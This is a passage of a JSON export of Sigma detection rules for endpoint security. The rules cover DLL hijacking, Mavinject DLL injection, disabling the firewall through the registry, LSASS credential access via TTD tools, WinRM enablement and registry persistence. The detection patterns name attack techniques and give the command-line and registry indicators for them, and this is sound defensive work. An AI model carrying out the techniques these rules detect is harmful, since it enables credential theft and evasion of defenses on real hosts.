"rule_id": "319b37d1-f75a-4426-9484-efa3e3788527",
"rule_name": "DLL Hijacking via licensingdiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via licensingdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "31ccdc74-069f-43fc-87d2-615dcae0c977",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070652Z",
"creation_date": "2026-03-23T11:45:34.070654Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070658Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Mavinject/",
"https://attack.mitre.org/techniques/T1218/013/",
"https://attack.mitre.org/techniques/T1055/001/"
],
"name": "t1218_013_mavinject.yml",
"content": "title: Proxy Execution via Mavinject\nid: 31ccdc74-069f-43fc-87d2-615dcae0c977\ndescription: |\n Detects a suspicious execution of Microsoft Application Virtualization Injector Mavinject.exe to proxy execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to inject malicious DLLs into running processes.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to ensure that the injected DLL is legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mavinject/\n - https://attack.mitre.org/techniques/T1218/013/\n - https://attack.mitre.org/techniques/T1055/001/\ndate: 2022/02/28\nmodified: 2025/06/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.013\n - attack.t1055.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mavinject\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'mavinject32.exe'\n - 'mavinject64.exe'\n CommandLine|contains: ' /INJECTRUNNING *.dll'\n\n exclusion_appvclient:\n CommandLine:\n - '?:\\WINDOWS\\system32\\mavinject.exe * /INJECTRUNNING ?:\\Windows\\System32\\Subsystems\\AppVEntSubsystems64.dll 1'\n - '?:\\Windows\\SysWOW64\\mavinject.exe * /INJECTRUNNING ?:\\Windows\\System32\\Subsystems\\AppVEntSubsystems32.dll 1'\n ParentImage: '?:\\Windows\\System32\\AppVClient.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "31ccdc74-069f-43fc-87d2-615dcae0c977",
"rule_name": "Proxy Execution via Mavinject",
"rule_description": "Detects a suspicious execution of Microsoft Application Virtualization Injector Mavinject.exe to proxy execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to inject malicious DLLs into running processes.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to ensure that the injected DLL is legitimate.\n",
"rule_creation_date": "2022-02-28",
"rule_modified_date": "2025-06-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.001",
"attack.t1218.013"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "31dac5b8-d9c0-4cae-865a-9d528c8e6c00",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586826Z",
"creation_date": "2026-03-23T11:45:34.586829Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586837Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netplwiz.yml",
"content": "title: DLL Hijacking via netplwiz.exe\nid: 31dac5b8-d9c0-4cae-865a-9d528c8e6c00\ndescription: |\n Detects potential Windows DLL Hijacking via netplwiz.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netplwiz.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\DSROLE.dll'\n - '\\NETPLWIZ.dll'\n - '\\netutils.dll'\n - '\\PROPSYS.dll'\n - '\\samcli.dll'\n - '\\SAMLIB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "31dac5b8-d9c0-4cae-865a-9d528c8e6c00",
"rule_name": "DLL Hijacking via netplwiz.exe",
"rule_description": "Detects potential Windows DLL Hijacking via netplwiz.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "31dd17cd-3ed5-4e4d-949f-71cfddc70c1e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086751Z",
"creation_date": "2026-03-23T11:45:34.086753Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086758Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/software/S0075/"
],
"name": "t1562_004_registry_disable_firewall_public_profile.yml",
"content": "title: Windows Firewall Disabled for Public Profile via Registry\nid: 31dd17cd-3ed5-4e4d-949f-71cfddc70c1e\ndescription: |\n Detects when the firewall is disabled for the public profile.\n Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\n It is recommended to investigate the process performing this action to determine its legitimacy as well as to look for other suspicious actions on the affected host.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/software/S0075/\ndate: 2021/10/14\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.s0075\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\\EnableFirewall'\n Details: 'DWORD (0x00000000)'\n\n # Avoid detection when Windows firewall is disabled in graphic mode\n # We have specific rules to detect deactivation via netsh or powershell\n # This rule can match a deactivation via reg.exe for example (used by some malwares or test frameworks)\n filter_svchost:\n ProcessCommandLine:\n - '?:\\windows\\system32\\svchost.exe -k localservicenonetwork'\n - '?:\\windows\\system32\\svchost.exe -k localservicenonetworkfirewall -p'\n - '?:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork -p'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "31dd17cd-3ed5-4e4d-949f-71cfddc70c1e",
"rule_name": "Windows Firewall Disabled for Public Profile via Registry",
"rule_description": "Detects when the firewall is disabled for the public profile.\nAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\nIt is recommended to investigate the process performing this action to determine its legitimacy as well as to look for other suspicious actions on the affected host.\n",
"rule_creation_date": "2021-10-14",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075072Z",
"creation_date": "2026-03-23T11:45:34.075074Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075079Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_debugger_tracing_read_access.yml",
"content": "title: LSASS Accessed via Debugger Tool\nid: 31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778\ndescription: |\n Detects the use of legitimate debugging tools such as TTDInject or TTTracer to trace the lsass.exe process.\n Time Travel Debugging (TTD) refers to the ability to track and keep records of the state of a running process over time.\n This can be exploited to capture sensitive information like credentials or memory contents.\n It is recommended to investigate the source of the debugging activity, analyze the command-line arguments for suspicious patterns, and review process interactions to identify potential malicious content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/04\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.Tttracer\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: \"PROCESS_VM_READ\"\n\n selection_ttdinject_calltrace:\n CallTrace|contains: 'ttdinject.exe'\n\n selection_ttdinject_original_name:\n ProcessOriginalFileName: 'TTDInject.EXE'\n\n condition: selection and 1 of selection_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "31f4d3b1-b0a6-4fd6-9619-caa9a6bd7778",
"rule_name": "LSASS Accessed via Debugger Tool",
"rule_description": "Detects the use of legitimate debugging tools such as TTDInject or TTTracer to trace the lsass.exe process.\nTime Travel Debugging (TTD) refers to the ability to track and keep records of the state of a running process over time.\nThis can be exploited to capture sensitive information like credentials or memory contents.\nIt is recommended to investigate the source of the debugging activity, analyze the command-line arguments for suspicious patterns, and review process interactions to identify potential malicious content.\n",
"rule_creation_date": "2021-06-04",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3201beb0-92c6-4539-9056-3a82a91c968b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598735Z",
"creation_date": "2026-03-23T11:45:34.598739Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598746Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/002/"
],
"name": "t1087_002_dscacheutil_discovery_user_macos.yml",
"content": "title: Users Listed via dscacheutil\nid: 3201beb0-92c6-4539-9056-3a82a91c968b\ndescription: |\n Detects the execution of the dscacheutil command to query information about users.\n Adversaries can use this information for lateral movement or privilege escalation.\n It is recommended to check for malicious behavior by the process launching dscacheutil.\nreferences:\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2024/06/13\nmodified: 2025/05/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1087.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: 'dscacheutil'\n CommandLine|contains: '-q user'\n\n exclusion_legitimate_parent:\n ParentImage:\n - '/Library/Application Support/AirWatch/hubd'\n - '/usr/local/libexec/ec2-macos-init'\n - '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3201beb0-92c6-4539-9056-3a82a91c968b",
"rule_name": "Users Listed via dscacheutil",
"rule_description": "Detects the execution of the dscacheutil command to query information about users.\nAdversaries can use this information for lateral movement or privilege escalation.\nIt is recommended to check for malicious behavior by the process launching dscacheutil.\n",
"rule_creation_date": "2024-06-13",
"rule_modified_date": "2025-05-15",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.001",
"attack.t1087.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3205ac34-383e-49e2-b12e-a0917cf9ef07",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073489Z",
"creation_date": "2026-03-23T11:45:34.073491Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073495Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1620_suspicious_dotnet_exchange.yml",
"content": "title: Suspicious Dotnet Assembly Loaded by Exchange Server\nid: 3205ac34-383e-49e2-b12e-a0917cf9ef07\ndescription: |\n Detects the loading of a suspicious Dotnet library by Exchange Server.\n Attackers may dynamically load assemblies in Exchange to stealthily execute further actions.\n It is recommended to investigate the IIS processes near and after the load for suspicious behavior.\nreferences:\n - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/07/25\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_assembly:\n AssemblyFlags: '0x0'\n FullyQualifiedAssemblyName|contains:\n - 'Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'\n - 'Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n ProcessName: 'w3wp.exe'\n\n selection_app_exchange:\n - ProcessCommandLine|contains: 'exchange'\n ProcessName: 'w3wp.exe'\n - ProcessParentCommandLine|contains: 'exchange'\n ProcessParentName: 'w3wp.exe'\n - ProcessGrandparentCommandLine|contains: 'exchange'\n ProcessGrandparentName: 'w3wp.exe'\n\n filter_path:\n ModuleILPath|contains: ':\\'\n\n exclusion_unknown:\n FullyQualifiedAssemblyName: '????????, Version=?.0.0.0, Culture=neutral, PublicKeyToken=null'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3205ac34-383e-49e2-b12e-a0917cf9ef07",
"rule_name": "Suspicious Dotnet Assembly Loaded by Exchange Server",
"rule_description": "Detects the loading of a suspicious Dotnet library by Exchange Server.\nAttackers may dynamically load assemblies in Exchange to stealthily execute further actions.\nIt is recommended to investigate the IIS processes near and after the load for suspicious behavior.\n",
"rule_creation_date": "2025-07-25",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "32191273-d165-4ec0-87ae-c0ebbdbda1af",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620831Z",
"creation_date": "2026-03-23T11:45:34.620832Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620837Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management",
"https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1021_006_winrm_service_auto.yml",
"content": "title: WinRM Service auto-start Enabled\nid: 32191273-d165-4ec0-87ae-c0ebbdbda1af\ndescription: |\n Detects when the Windows Remote Management (WinRM) service is set to auto-start.\n Windows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\n This can be used by an attacker to move laterally within an organization.\n It is recommended to analyze the process responsible for the registry modification as well as to look for subsequent, unwanted usage of WinRM.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management\n - https://learn.microsoft.com/en-us/powershell/scripting/learn/remoting/winrmsecurity?view=powershell-7.2\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2022/11/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinRM\\Start'\n Details: 'DWORD (0x00000002)' # SERVICE_AUTO_START\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: 
'?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_exchange:\n ProcessOriginalFileName: 'ExSetupUI.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "32191273-d165-4ec0-87ae-c0ebbdbda1af",
"rule_name": "WinRM Service auto-start Enabled",
"rule_description": "Detects when the Windows Remote Management (WinRM) service is set to auto-start.\nWindows Remote Management is a common Windows service that is used to interact with a remote system and is used, in particular, by PowerShell Remoting.\nThis can be used by an attacker to move laterally within an organization.\nIt is recommended to analyze the process responsible for the registry modification as well as to look for subsequent, unwanted usage of WinRM.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "323dc7e5-08a1-429c-83b5-3df588b5a245",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082314Z",
"creation_date": "2026-03-23T11:45:34.082316Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082320Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/explorertools.html",
"https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_explorer_tools.yml",
"content": "title: Possible Explorer Tools Persistence Added\nid: 323dc7e5-08a1-429c-83b5-3df588b5a245\ndescription: |\n Detects the modification of the Explorer Tools registry keys that list tools sometimes called by Windows.\n This method is used as a means to achieve persistence by replacing one of the registry keys with a malicious payload.\n It is recommended to analyze the process responsible for this registry modification to look for other malicious actions, as well as to analyze the file pointed to by the registry value.\nreferences:\n - https://persistence-info.github.io/Data/explorertools.html\n - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\BackupPath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\cleanuppath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\defragpath\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace\\(Default)'\n - 